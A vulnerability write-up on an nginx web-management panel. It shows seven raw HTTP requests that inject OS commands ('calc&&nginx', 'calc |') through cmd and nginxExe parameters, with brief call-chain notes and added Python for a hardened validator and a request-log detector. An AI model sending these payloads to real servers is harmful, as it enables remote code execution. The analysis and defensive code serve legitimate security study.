Preface
Putting together the current unauthenticated-access situation with the backend RCEs analysed earlier, this is a consolidated list of the command-execution paths, each with a fairly brief analysis.
「Command Execution 1」
GET /AdminPage/conf/runCmd?cmd=calc%26%26nginx HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

com.cym.controller.adminPage.ConfController#runCmd

When execution reaches runCmd, the cmd parameter is attacker-controlled. Some validation and filtering is applied, but the only requirement is that cmd contains the string nginx; execution then continues, so && is used to chain an arbitrary command onto the nginx token (calc&&nginx in the request above).
「Command Execution 2」
POST /AdminPage/remote/cmdOver HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

remoteId=local&cmd=start calc%26%26nginx&interval=1

com.cym.controller.adminPage.RemoteController#cmdOver

When the supplied parameter values pass the controller's checks, the call chain eventually reaches com.cym.controller.adminPage.ConfController#runCmd
com.cym.controller.adminPage.ConfController#runCmd

As in 「Command Execution 1」, once execution reaches runCmd the cmd parameter is attacker-controlled; the only filter is that cmd must contain the string nginx, so && chains an arbitrary command onto it (start calc&&nginx here).
「Command Execution 3」
POST /Api/nginx/runNginxCmd HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

cmd=calc%26%26nginx

com.cym.controller.api.NginxApiController#runNginxCmd

com.cym.controller.adminPage.ConfController#runCmd

Same sink as in 「Command Execution 1」: once execution reaches runCmd the cmd parameter is attacker-controlled; the only filter is that cmd must contain the string nginx, so && chains an arbitrary command onto it.
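Sections 1 to 3 all terminate in the same sink, so one added example covers them. The Python below is written for this page and is not taken from the project's own (Java) code: it models the substring check described above, shows which program a shell actually starts for the chained payloads, and places a hardened validator beside it. The allow-listed binaries and actions, the function names, and the assumption that the original runs the string through a shell (which is what makes && effective) are all mine.

```python
import re
import shlex
import subprocess
from typing import Dict, List

# Payloads from the requests in sections 1 to 3, URL-decoded.
PAGE_PAYLOADS = ["calc&&nginx", "start calc&&nginx"]

# Reconstruction of the check described in the write-up: the only condition
# on `cmd` is that the substring "nginx" occurs somewhere in it.
# This models the described behaviour; it is not the project's own code.
def weak_filter_accepts(cmd: str) -> bool:
    return "nginx" in cmd

# Splits on the separators that cmd.exe and sh treat as command boundaries
# and returns the first program the shell would actually start. Illustrates
# why "calc&&nginx" satisfies the filter yet runs calc first.
_SEPARATORS = re.compile(r"&&|\|\||[&|;]")

def first_program_shell_would_run(cmdline: str) -> str:
    head = _SEPARATORS.split(cmdline, maxsplit=1)[0]
    return shlex.split(head)[0]

# Hardened validator (added, hypothetical design): reject shell
# metacharacters outright, tokenise what remains, require argv[0] to be an
# allow-listed nginx binary and the remaining arguments to form one of a
# fixed set of actions. "-c <file>" is deliberately absent: pointing nginx
# at an attacker-written config is its own code-execution path.
ALLOWED_BINARIES = {"nginx", "nginx.exe", "/usr/sbin/nginx", "/usr/local/nginx/sbin/nginx"}
ALLOWED_ACTIONS = {("-t",), ("-v",), ("-V",), ("-s", "reload"), ("-s", "stop"), ("-s", "quit")}
_SHELL_META = re.compile(r"[&|;`$<>(){}\r\n]")

def strict_parse(cmd: str) -> List[str]:
    if _SHELL_META.search(cmd):
        raise ValueError("shell metacharacter in cmd")
    argv = shlex.split(cmd)  # also raises ValueError on unbalanced quotes
    if not argv or argv[0] not in ALLOWED_BINARIES:
        raise ValueError("argv[0] is not an allow-listed nginx binary")
    if tuple(argv[1:]) not in ALLOWED_ACTIONS:
        raise ValueError("unsupported nginx action: %r" % (argv[1:],))
    return argv

def run_nginx(cmd: str) -> subprocess.CompletedProcess:
    # shell=False (the default): the argv list goes straight to the OS, so
    # even a stray "&&" inside an argument would be literal text, never a
    # second command.
    return subprocess.run(strict_parse(cmd), capture_output=True, text=True, check=False)

def triage(cmd: str) -> Dict[str, bool]:
    """Run both filters over one input so the difference is visible."""
    try:
        strict_parse(cmd)
        strict_ok = True
    except ValueError:
        strict_ok = False
    return {"weak_accepts": weak_filter_accepts(cmd), "strict_accepts": strict_ok}

if __name__ == "__main__":
    for sample in PAGE_PAYLOADS + ["nginx -s reload", "nginx -c /tmp/attacker.conf"]:
        print(f"{sample!r}: {triage(sample)}")
```

The point of the pairing is that a substring check on a string later handed to a shell cannot be repaired by adding more forbidden substrings; the fix is to stop building a shell string at all and validate a structured argv against an allow-list.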
「Command Execution 4」
GET /AdminPage/conf/reload?nginxExe=calc%20%7C HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

com.cym.controller.adminPage.ConfController#reload

「Command Execution 5」
POST /AdminPage/conf/check HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

nginxExe=calc%20%7C&json={"nginxContent":"","subContent":"[]","subName":"[]"}&nginxPath=/1/

com.cym.controller.adminPage.ConfController#check

Many conditions have to be met before this one can be triggered.
「Command Execution 6」
POST /AdminPage/conf/saveCmd HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

nginxExe=calc%20%7C&nginxPath=/&nginxDir=/

com.cym.controller.adminPage.ConfController#saveCmd

saveCmd stores the submitted parameters as configuration.
GET /AdminPage/conf/checkBase HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

checkBase reads the stored values back from the configuration, loads them, and executes the command.
com.cym.controller.adminPage.ConfController#checkBase
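Sections 4 to 7 all revolve around a supplied or stored nginxExe value of calc | being used as the leading word of a command. The page does not show the command template, so the unsafe builder below assumes a shape of "<nginxExe> -t -c <conf>" run through a shell; that template, the allow-listed binary names, the directory-containment rule and all function names are assumptions made for this added example, which is not the project's code. It shows validating the value both where saveCmd stores it and where checkBase (or /Api/nginx/check) consumes it.

```python
import os
import re
from typing import Callable, List

# Values from the requests in sections 4 to 7, URL-decoded.
PAGE_NGINX_EXE = "calc |"
PAGE_NGINX_PATH = "/1/"

# Assumed command template. The write-up shows only that nginxExe=calc |
# leads to execution; the exact template is not on the page, so the shape
# "<nginxExe> -t -c <conf>" passed to a shell is an assumption used here.
def build_shell_command_unsafe(nginx_exe: str, conf_path: str) -> str:
    return f"{nginx_exe} -t -c {conf_path}"
# With the page's value this is "calc | -t -c /1/": the shell starts calc and
# pipes its output into a second (failing) command, which is enough for RCE.

# Hardened handling (added, hypothetical design). Validate in saveCmd before
# the value is persisted AND again in checkBase before it is executed; a
# value that reached the config file through any other path must not be
# trusted just because it came from the config.
_ALLOWED_BASENAMES = {"nginx", "nginx.exe"}
_BAD_CHARS = re.compile(r"[&|;`$<>(){}\"'\r\n]")

def validate_nginx_exe(nginx_exe: str, must_exist: bool = True) -> str:
    if not nginx_exe or _BAD_CHARS.search(nginx_exe):
        raise ValueError("nginxExe contains quotes or shell metacharacters")
    # realpath() normalises "..", symlinks and stray components, so the value
    # that is executed is exactly the one that was checked.
    real = os.path.realpath(nginx_exe)
    if os.path.basename(real) not in _ALLOWED_BASENAMES:
        raise ValueError("nginxExe does not name an nginx binary")
    if must_exist and not (os.path.isfile(real) and os.access(real, os.X_OK)):
        raise ValueError("nginxExe is not an executable file on this host")
    return real

def validate_conf_path(conf_path: str, allowed_root: str) -> str:
    # Canonicalise both sides so "../" and symlinks cannot escape the root.
    real = os.path.realpath(conf_path)
    root = os.path.realpath(allowed_root)
    if os.path.commonpath([real, root]) != root:
        raise ValueError("nginxPath escapes the configured directory")
    return real

def build_argv_safe(nginx_exe: str, conf_path: str, allowed_root: str,
                    must_exist: bool = True) -> List[str]:
    # Returns an argv list for a shell-less process API; no string is ever
    # re-parsed by a shell, so a stored "calc |" could not become a command.
    return [validate_nginx_exe(nginx_exe, must_exist), "-t", "-c",
            validate_conf_path(conf_path, allowed_root)]

def rejects(fn: Callable, *args, **kwargs) -> bool:
    """True if fn raises ValueError for these arguments."""
    try:
        fn(*args, **kwargs)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    print(build_shell_command_unsafe(PAGE_NGINX_EXE, PAGE_NGINX_PATH))
    print("rejected:", rejects(validate_nginx_exe, PAGE_NGINX_EXE))
```

Whitespace is deliberately not rejected in validate_nginx_exe: a Windows path such as one under "Program Files" is legitimate, and because the result is passed as a single argv element it is never re-split. must_exist=True is the production default; the demo only relaxes it so the checks can run on a host without nginx installed.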

「Command Execution 7」
POST /AdminPage/conf/saveCmd HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

nginxExe=calc%20%7C&nginxPath=/&nginxDir=/

GET /Api/nginx/check HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
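As a detection-side complement to the seven paths above, an added example that is not from the page or the project: a small inspector over request records shaped like the requests shown in this post. The sample list is constructed from the page's own requests (sections 1 to 6, including the saveCmd-then-checkBase pair that section 7 repeats with /Api/nginx/check) plus two benign ones; the endpoint set and parameter names come from the sections above, while the heuristics and the stateful store-then-execute rule are assumptions of mine. Inputs are (method, target, body) tuples as a reverse proxy or WAF log would provide; a plain nginx access log does not carry POST bodies, so for the POST endpoints this needs body logging.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit

# Endpoints named in the write-up, lower-cased: the page's own requests mix
# /AdminPage and /adminPage, so paths are compared case-insensitively.
SENSITIVE_ENDPOINTS = {
    "/adminpage/conf/runcmd", "/adminpage/remote/cmdover", "/api/nginx/runnginxcmd",
    "/adminpage/conf/reload", "/adminpage/conf/check", "/adminpage/conf/savecmd",
    "/adminpage/conf/checkbase", "/api/nginx/check",
}
STORE_ENDPOINT = "/adminpage/conf/savecmd"
CONSUME_ENDPOINTS = {"/adminpage/conf/checkbase", "/api/nginx/check"}
COMMAND_PARAMS = {"cmd", "nginxexe"}  # parameters that end up in a command line
_META = re.compile(r"&&|\|\||[|;&`$<>]")
_NGINX_NAMES = {"nginx", "nginx.exe"}

Record = Tuple[str, str, str]  # (method, request-target, body)

# Constructed sample: the page's requests plus two benign ones at the end.
SAMPLE_REQUESTS: List[Record] = [
    ("GET", "/AdminPage/conf/runCmd?cmd=calc%26%26nginx", ""),
    ("POST", "/AdminPage/remote/cmdOver", "remoteId=local&cmd=start calc%26%26nginx&interval=1"),
    ("POST", "/Api/nginx/runNginxCmd", "cmd=calc%26%26nginx"),
    ("GET", "/AdminPage/conf/reload?nginxExe=calc%20%7C", ""),
    ("POST", "/AdminPage/conf/saveCmd", "nginxExe=calc%20%7C&nginxPath=/&nginxDir=/"),
    ("GET", "/AdminPage/conf/checkBase", ""),
    ("GET", "/AdminPage/conf/runCmd?cmd=nginx%20-s%20reload", ""),
    ("POST", "/AdminPage/conf/saveCmd",
     "nginxExe=/usr/sbin/nginx&nginxPath=/etc/nginx/nginx.conf&nginxDir=/etc/nginx"),
]

def _params(query: str, body: str) -> Dict[str, List[str]]:
    merged: Dict[str, List[str]] = {}
    for src in (query, body):
        for key, values in parse_qs(src, keep_blank_values=True).items():
            merged.setdefault(key.lower(), []).extend(values)
    return merged

def _program_name(name: str, value: str) -> str:
    # nginxExe is a whole path (may contain spaces); cmd is a command line,
    # so only its first whitespace-separated token names the program.
    head = value if name == "nginxexe" else (value.split() or [""])[0]
    return re.split(r"[\\/]", head)[-1]

def inspect_request(method: str, target: str, body: str = "") -> dict:
    parts = urlsplit(target)
    path = parts.path.lower()
    result = {"method": method.upper(), "path": path, "suspicious": []}
    if path not in SENSITIVE_ENDPOINTS:
        return result
    for name, values in _params(parts.query, body).items():
        if name not in COMMAND_PARAMS:
            continue
        for value in values:
            if _META.search(value):
                result["suspicious"].append((name, value, "shell separator"))
            elif _program_name(name, value) not in _NGINX_NAMES:
                result["suspicious"].append((name, value, "program is not nginx"))
    return result

def scan(records: List[Record]) -> List[Tuple[str, str, str]]:
    """Per-request checks plus one stateful rule: once a tainted nginxExe has
    been stored via saveCmd, the endpoints that read the stored value back
    (checkBase, /Api/nginx/check) are flagged as the execution step even
    though those requests carry no parameters of their own."""
    alerts = []
    stored_tainted = False
    for method, target, body in records:
        r = inspect_request(method, target, body)
        if r["suspicious"]:
            detail = "; ".join(f"{n}={v!r} ({why})" for n, v, why in r["suspicious"])
            alerts.append((r["method"], r["path"], detail))
            if r["path"] == STORE_ENDPOINT:
                stored_tainted = True
        elif r["path"] == STORE_ENDPOINT:
            stored_tainted = False  # a clean save overwrote the stored value
        elif stored_tainted and r["path"] in CONSUME_ENDPOINTS:
            alerts.append((r["method"], r["path"], "executes previously stored tainted nginxExe"))
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print(*alert)
```

The "program is not nginx" rule fires on attempts the weak filter would have blocked (cmd=powershell, say); those are still worth an alert, since a probe against these endpoints from an unauthenticated client is the interesting signal regardless of whether that particular payload ran.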
